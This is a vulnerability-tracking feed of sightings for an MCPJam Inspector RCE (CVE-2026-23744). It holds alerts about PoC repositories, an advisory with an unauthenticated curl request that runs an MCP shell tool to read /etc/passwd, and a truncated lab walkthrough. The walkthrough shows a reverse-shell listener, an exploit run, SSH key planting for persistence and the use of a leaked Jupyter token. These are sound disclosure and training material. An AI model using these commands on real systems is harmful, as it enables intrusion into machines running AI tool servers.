Most recent sightings.

Most recent sightings. https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Thu, 18 Jun 2026 12:34:41 +0000 428dfd18-8cc4-41a5-bc61-cf35dbe22f27 https://vulnerability.circl.lu/sighting/428dfd18-8cc4-41a5-bc61-cf35dbe22f27/export {"uuid": "428dfd18-8cc4-41a5-bc61-cf35dbe22f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87048", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MrR0b0t19\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-02 23:19:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T00:00:04.000000Z"} {"uuid": "428dfd18-8cc4-41a5-bc61-cf35dbe22f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87048", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MrR0b0t19\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-02 23:19:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T00:00:04.000000Z"} https://vulnerability.circl.lu/sighting/428dfd18-8cc4-41a5-bc61-cf35dbe22f27/export Wed, 03 Jun 2026 00:00:04 +0000 3c810799-9a06-436e-97e7-650388a660c5 https://vulnerability.circl.lu/sighting/3c810799-9a06-436e-97e7-650388a660c5/export {"uuid": "3c810799-9a06-436e-97e7-650388a660c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87070", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a mcp-pwn\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jf-gondim\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-03 02:47:19\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC exploit for CVE-2026-23744 \u2014 unauthenticated RCE in MCPJam Inspector via unvalidated serverConfig command injection on /api/mcp/connect, enabling reverse shell as process owner without credentials.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T03:05:03.000000Z"} {"uuid": "3c810799-9a06-436e-97e7-650388a660c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87070", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a mcp-pwn\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jf-gondim\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-03 02:47:19\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC exploit for CVE-2026-23744 \u2014 unauthenticated RCE in MCPJam Inspector via unvalidated serverConfig command injection on /api/mcp/connect, enabling reverse shell as process owner without credentials.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T03:05:03.000000Z"} https://vulnerability.circl.lu/sighting/3c810799-9a06-436e-97e7-650388a660c5/export Wed, 03 Jun 2026 03:05:03 +0000 9a5d0e51-68d4-423a-a7e2-887607b53ff5 https://vulnerability.circl.lu/sighting/9a5d0e51-68d4-423a-a7e2-887607b53ff5/export {"uuid": "9a5d0e51-68d4-423a-a7e2-887607b53ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/5i-pTes7Ja_8Uhuw9wP6auiAd2fWyZYO3DYvaqIb_mREm_4", "content": "", "creation_timestamp": "2026-06-03T09:00:04.000000Z"} {"uuid": "9a5d0e51-68d4-423a-a7e2-887607b53ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/5i-pTes7Ja_8Uhuw9wP6auiAd2fWyZYO3DYvaqIb_mREm_4", "content": "", "creation_timestamp": "2026-06-03T09:00:04.000000Z"} https://vulnerability.circl.lu/sighting/9a5d0e51-68d4-423a-a7e2-887607b53ff5/export Wed, 03 Jun 2026 09:00:04 +0000 150e0d93-d011-4983-8339-52110854caa2 https://vulnerability.circl.lu/sighting/150e0d93-d011-4983-8339-52110854caa2/export {"uuid": "150e0d93-d011-4983-8339-52110854caa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/hAogTto79Jt-ZuW6Hp_UeFLdQ6LmAiGRTnFY6xKkiQBfaYY", "content": "", "creation_timestamp": "2026-06-04T21:00:04.000000Z"} {"uuid": "150e0d93-d011-4983-8339-52110854caa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/hAogTto79Jt-ZuW6Hp_UeFLdQ6LmAiGRTnFY6xKkiQBfaYY", "content": "", "creation_timestamp": "2026-06-04T21:00:04.000000Z"} https://vulnerability.circl.lu/sighting/150e0d93-d011-4983-8339-52110854caa2/export Thu, 04 Jun 2026 21:00:04 +0000 5f145d69-fe77-48fc-82c9-b65062fc3136 https://vulnerability.circl.lu/sighting/5f145d69-fe77-48fc-82c9-b65062fc3136/export {"uuid": "5f145d69-fe77-48fc-82c9-b65062fc3136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87381", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-MCPJAM-RCE-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Dahalsamir\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 05:22:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis Python proof-of-concept targets a vulnerable MCP (Model Context Protocol) service exposed by the target application. The vulnerability allows an attacker to supply arbitrary server configuration parameters through the /api/mcp/connect endpoint.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T06:04:18.000000Z"} {"uuid": "5f145d69-fe77-48fc-82c9-b65062fc3136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87381", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-MCPJAM-RCE-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Dahalsamir\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 05:22:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis Python proof-of-concept targets a vulnerable MCP (Model Context Protocol) service exposed by the target application. The vulnerability allows an attacker to supply arbitrary server configuration parameters through the /api/mcp/connect endpoint.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T06:04:18.000000Z"} https://vulnerability.circl.lu/sighting/5f145d69-fe77-48fc-82c9-b65062fc3136/export Fri, 05 Jun 2026 06:04:18 +0000 ced08f13-fc88-40df-94d9-f636fd205102 https://vulnerability.circl.lu/sighting/ced08f13-fc88-40df-94d9-f636fd205102/export {"uuid": "ced08f13-fc88-40df-94d9-f636fd205102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87395", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a keeieb79\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 07:38:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\ncve-2026-23744 python exploit\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T08:31:40.000000Z"} {"uuid": "ced08f13-fc88-40df-94d9-f636fd205102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87395", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a keeieb79\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 07:38:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\ncve-2026-23744 python exploit\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T08:31:40.000000Z"} https://vulnerability.circl.lu/sighting/ced08f13-fc88-40df-94d9-f636fd205102/export Fri, 05 Jun 2026 08:31:40 +0000 8f26a78d-5a1f-4632-9385-64f9ea1ba748 https://vulnerability.circl.lu/sighting/8f26a78d-5a1f-4632-9385-64f9ea1ba748/export {"uuid": "8f26a78d-5a1f-4632-9385-64f9ea1ba748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"} {"uuid": "8f26a78d-5a1f-4632-9385-64f9ea1ba748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"} https://vulnerability.circl.lu/sighting/8f26a78d-5a1f-4632-9385-64f9ea1ba748/export Fri, 05 Jun 2026 09:00:04 +0000 78673c3a-b92c-4903-906b-0057b7b42487 https://vulnerability.circl.lu/sighting/78673c3a-b92c-4903-906b-0057b7b42487/export {"uuid": "78673c3a-b92c-4903-906b-0057b7b42487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-06-07)", "content": "", "creation_timestamp": "2026-06-07T00:00:00.000000Z"} {"uuid": "78673c3a-b92c-4903-906b-0057b7b42487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-06-07)", "content": "", "creation_timestamp": "2026-06-07T00:00:00.000000Z"} https://vulnerability.circl.lu/sighting/78673c3a-b92c-4903-906b-0057b7b42487/export Sun, 07 Jun 2026 00:00:00 +0000 fe9f708b-c492-46b1-91dd-34d3178cc9c6 https://vulnerability.circl.lu/sighting/fe9f708b-c492-46b1-91dd-34d3178cc9c6/export {"uuid": "fe9f708b-c492-46b1-91dd-34d3178cc9c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "\n\n### Summary\n\nMissing authentication on MCP Manager and Adapter HTTP API endpoints allows any network-accessible attacker to execute arbitrary MCP tools without authentication. When a used MCP server allows system command execution capabilities, this vulnerability could be exploited to perform Remote Code Execution (RCE).\n\nThis vulnerability is similar to [CVE-2026-23744](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) and [CVE-2025-49596](https://github.com/advisories/GHSA-7f8r-222p-6f5g). This vulnerability is exploitable with no user interaction and doesn't require authentication. Since MCPJam Inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n\n### Details\n\nThe `/api/mcp/adapter-http/:serverId` and `/api/mcp/manager-http/:serverId` endpoints are explicitly excluded from authentication middleware in server/middleware/session-auth.ts (lines 45-46):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/middleware/session-auth.ts#L45\n\ntypescriptconst UNPROTECTED_PREFIXES = [\n ...\n \"/api/mcp/adapter-http/\", // HTTP adapter for tunneled MCP clients - auth via URL secrecy\n \"/api/mcp/manager-http/\", // HTTP manager for tunneled MCP clients - auth via URL secrecy\n];\n\n```\n\nThese endpoints accept JSON-RPC requests and forward them directly to connected MCP servers without any authentication checks (see server/routes/mcp/http-adapters.ts, lines 149-159):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/routes/mcp/http-adapters.ts#L149\n\ntypescriptconst response = await handleJsonRpc(\n normalizedServerId,\n body as any,\n clientManager,\n mode,\n);\nreturn c.json(response);\n\n```\n\nSince MCPJam Inspector binds to `0.0.0.0` by default, its HTTP APIs are remotely reachable. An attacker requires:\n\n* Network connectivity to MCPJam Inspector (local network, Docker exposed port, or HOSTED_MODE deployment)\n* Knowledge or enumeration of a valid `serverId` (common values: \"local\", \"default\", \"asana\", \"github\", \"notion\")\n\n**No authentication, authorization, or request validation is performed.**\n\n### PoC\nRun MCPJam using below command:\n\n```bash\nnpx @mcpjam/inspector@latest\n```\n\nThen Install an MCP server allowing to run system command. I used the following MCP server as an example which allows running system commands: [[mac-shell-mcp](https://github.com/cfdude/mac-shell-mcp)](https://github.com/cfdude/mac-shell-mcp).\n\nYou can invoke this MCP server through MCPJam directly without authentication through the following HTTP request. Below is the curl request, and notice that it doesn't require any authentication or the authorization bearer token in the header:\n\n```bash\ncurl --path-as-is -i -s -k -X POST \\\n -H 'Host: 127.0.0.1:6274' \\\n -H 'Content-Type: application/json' \\\n -d '{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\n \"command\": \"cat\",\n \"args\": [\"/etc/passwd\"]\n }\n }\n}' \\\n 'http://127.0.0.1:6274/api/mcp/adapter-http/shell-mcp'\n\n```\n\n\n\n\n\n\n\nYou can also use Burp Proxy to send the below request directly:\n\n\n```http\nPOST /api/mcp/adapter-http/shell-mcp HTTP/1.1\nHost: 127.0.0.1:6274\nContent-Type: application/json\nContent-Length: 195\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\"command\": \"cat\",\n\"args\":[\" /etc/passwd\"]}\n }\n }\n\n\n```\n\n\n\n\n\nThis issue was found on version `v1.5.16`\n\n\n\n\n\n### Impact\n\n\nThis vulnerability allows unauthorized remote attackers to execute arbitrary MCP tools without authentication, leading to complete compromise of the system when shell-enabled MCP servers are connected. The impact severity depends on the capabilities of the connected MCP servers:\n\n* **Unauthorized Tool Execution:** Attackers can invoke any MCP tool exposed by connected servers without authentication, bypassing all authorization controls.\n* **Data Exfiltration:** Unauthorized access to sensitive data through MCP resource reads, database queries, or file system operations.\n* **Remote Code Execution (RCE):** Direct system command execution through MCP servers like mac-shell-mcp, filesystem-mcp, or custom servers with command execution capabilities.\n* **Privilege Escalation:** If MCPJam Inspector runs with elevated privileges, attackers inherit those privileges for command execution.\n\n### Attack Scenarios:\n\n* **Local Network Attack:** Attacker on the same LAN (corporate network, coffee shop WiFi, shared workspace) can directly access exposed MCPJam endpoints.\n* **Cloud Deployment Attack:** HOSTED_MODE deployments without proper network isolation are accessible from the internet.\n* **Docker Misconfiguration:** Users running docker run -p 6274:6274 expose the vulnerability to anyone who can reach the host machine.\n", "creation_timestamp": "2026-06-12T18:31:30.000000Z"} {"uuid": "fe9f708b-c492-46b1-91dd-34d3178cc9c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "\n\n### Summary\n\nMissing authentication on MCP Manager and Adapter HTTP API endpoints allows any network-accessible attacker to execute arbitrary MCP tools without authentication. When a used MCP server allows system command execution capabilities, this vulnerability could be exploited to perform Remote Code Execution (RCE).\n\nThis vulnerability is similar to [CVE-2026-23744](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) and [CVE-2025-49596](https://github.com/advisories/GHSA-7f8r-222p-6f5g). This vulnerability is exploitable with no user interaction and doesn't require authentication. Since MCPJam Inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n\n### Details\n\nThe `/api/mcp/adapter-http/:serverId` and `/api/mcp/manager-http/:serverId` endpoints are explicitly excluded from authentication middleware in server/middleware/session-auth.ts (lines 45-46):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/middleware/session-auth.ts#L45\n\ntypescriptconst UNPROTECTED_PREFIXES = [\n ...\n \"/api/mcp/adapter-http/\", // HTTP adapter for tunneled MCP clients - auth via URL secrecy\n \"/api/mcp/manager-http/\", // HTTP manager for tunneled MCP clients - auth via URL secrecy\n];\n\n```\n\nThese endpoints accept JSON-RPC requests and forward them directly to connected MCP servers without any authentication checks (see server/routes/mcp/http-adapters.ts, lines 149-159):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/routes/mcp/http-adapters.ts#L149\n\ntypescriptconst response = await handleJsonRpc(\n normalizedServerId,\n body as any,\n clientManager,\n mode,\n);\nreturn c.json(response);\n\n```\n\nSince MCPJam Inspector binds to `0.0.0.0` by default, its HTTP APIs are remotely reachable. An attacker requires:\n\n* Network connectivity to MCPJam Inspector (local network, Docker exposed port, or HOSTED_MODE deployment)\n* Knowledge or enumeration of a valid `serverId` (common values: \"local\", \"default\", \"asana\", \"github\", \"notion\")\n\n**No authentication, authorization, or request validation is performed.**\n\n### PoC\nRun MCPJam using below command:\n\n```bash\nnpx @mcpjam/inspector@latest\n```\n\nThen Install an MCP server allowing to run system command. I used the following MCP server as an example which allows running system commands: [[mac-shell-mcp](https://github.com/cfdude/mac-shell-mcp)](https://github.com/cfdude/mac-shell-mcp).\n\nYou can invoke this MCP server through MCPJam directly without authentication through the following HTTP request. Below is the curl request, and notice that it doesn't require any authentication or the authorization bearer token in the header:\n\n```bash\ncurl --path-as-is -i -s -k -X POST \\\n -H 'Host: 127.0.0.1:6274' \\\n -H 'Content-Type: application/json' \\\n -d '{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\n \"command\": \"cat\",\n \"args\": [\"/etc/passwd\"]\n }\n }\n}' \\\n 'http://127.0.0.1:6274/api/mcp/adapter-http/shell-mcp'\n\n```\n\n\n\n\n\n\n\nYou can also use Burp Proxy to send the below request directly:\n\n\n```http\nPOST /api/mcp/adapter-http/shell-mcp HTTP/1.1\nHost: 127.0.0.1:6274\nContent-Type: application/json\nContent-Length: 195\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"execute_command\",\n \"arguments\": {\"command\": \"cat\",\n\"args\":[\" /etc/passwd\"]}\n }\n }\n\n\n```\n\n\n\n\n\nThis issue was found on version `v1.5.16`\n\n\n\n\n\n### Impact\n\n\nThis vulnerability allows unauthorized remote attackers to execute arbitrary MCP tools without authentication, leading to complete compromise of the system when shell-enabled MCP servers are connected. The impact severity depends on the capabilities of the connected MCP servers:\n\n* **Unauthorized Tool Execution:** Attackers can invoke any MCP tool exposed by connected servers without authentication, bypassing all authorization controls.\n* **Data Exfiltration:** Unauthorized access to sensitive data through MCP resource reads, database queries, or file system operations.\n* **Remote Code Execution (RCE):** Direct system command execution through MCP servers like mac-shell-mcp, filesystem-mcp, or custom servers with command execution capabilities.\n* **Privilege Escalation:** If MCPJam Inspector runs with elevated privileges, attackers inherit those privileges for command execution.\n\n### Attack Scenarios:\n\n* **Local Network Attack:** Attacker on the same LAN (corporate network, coffee shop WiFi, shared workspace) can directly access exposed MCPJam endpoints.\n* **Cloud Deployment Attack:** HOSTED_MODE deployments without proper network isolation are accessible from the internet.\n* **Docker Misconfiguration:** Users running docker run -p 6274:6274 expose the vulnerability to anyone who can reach the host machine.\n", "creation_timestamp": "2026-06-12T18:31:30.000000Z"} https://vulnerability.circl.lu/sighting/fe9f708b-c492-46b1-91dd-34d3178cc9c6/export Fri, 12 Jun 2026 18:31:30 +0000 c7da0f33-d719-4341-b950-79389d22c220 https://vulnerability.circl.lu/sighting/c7da0f33-d719-4341-b950-79389d22c220/export {"uuid": "c7da0f33-d719-4341-b950-79389d22c220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/Yann-P/597c2a31f6485fd849eb896411334a3f", "content": "\n1. nmap\n2. find port 80\n3. http page mentions mcp port 6274\n4. try access port 6274 in http\n5. shows mcpjam landing page\n6. find CVE and exploit https://raw.githubusercontent.com/alisster00/CVE-2026-23744-RCE/refs/heads/main/script.py\n7. reverse shell, `nc -l 10.10.15.61 4444`, `python mcpexploit.py --lport 4444 --lhost 10.10.15.61 -p 6274 devhub.htb`\n8. put autorized key, `echo 'ssh-ed25519 AAAAC3NzaC1l... htb' > ~/.ssh/authorized_keys`\n\n### Track 1: linpeas\n\n1. on host, `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh`\n2. on host, `scp -i ~/.ssh/htb ./linpeas.sh mcp-dev@devhub.htb:~/`\n3. on target, run linpeas\n\nFindings\n\n```\nhttps://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\nPackageKit version detected: 1.2.5\nVulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.5 is in the vulnerable range >=1.0.2 <=1.3.4\n```\n\nNot exploited for now.\n\n### Track 2: lateral movement to analyst\n\n10. ls /home, shows user \"analyst\"\n11. `ps aux | grep analyst`\n\n```\nanalyst 1077 0.0 2.4 182524 96256 ? Ss 09:53 0:06 /home/analyst/jupyter-env/bin/python3 /home/analyst/jupyter-env/bin/jupyter-lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 --ServerApp.password= --ServerApp.allow_origin= --ServerApp.disable_check_xsrf=False\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:01 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n### Track 3: Jupyter\n\n1. Expose port 8888\n2. `ssh -i ~/.ssh/htb mcp-dev@devhub.htb -L 8888:localhost:8888 `\n3. token is leaked by ps aux above, set up new password \"yolo\" on localhost:8888 web ui.\n4. new terminal on jupyterlab (shell as analyst) -> `cat user.txt` -> `e73a08ded246c24...`\n\nLateral to analyst succeeded. User flag solved.\n\nAdditional: \n1. `mkdir ~/.ssh && echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NT.... htb' > ~/.ssh/authorized_keys`\n\n### Track 4: linpeas again\n\n1. `scp -i ~/.ssh/htb ./linpeas.sh analyst@devhub.htb:~/`\n\nFindings\n\n```\n\u2550\u2563 Services with writable paths? . jupyter.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\njupyter.service: /home/analyst/jupyter-env/bin/jupyter (from ExecStart=/home/analyst/jupyter-env/bin/jupyter lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token='a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7' --ServerApp.password='' --ServerApp.allow_origin='' --ServerApp.disable_check_xsrf=False)\nopsmcp.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\n```\n\n\n### Exploration\n- 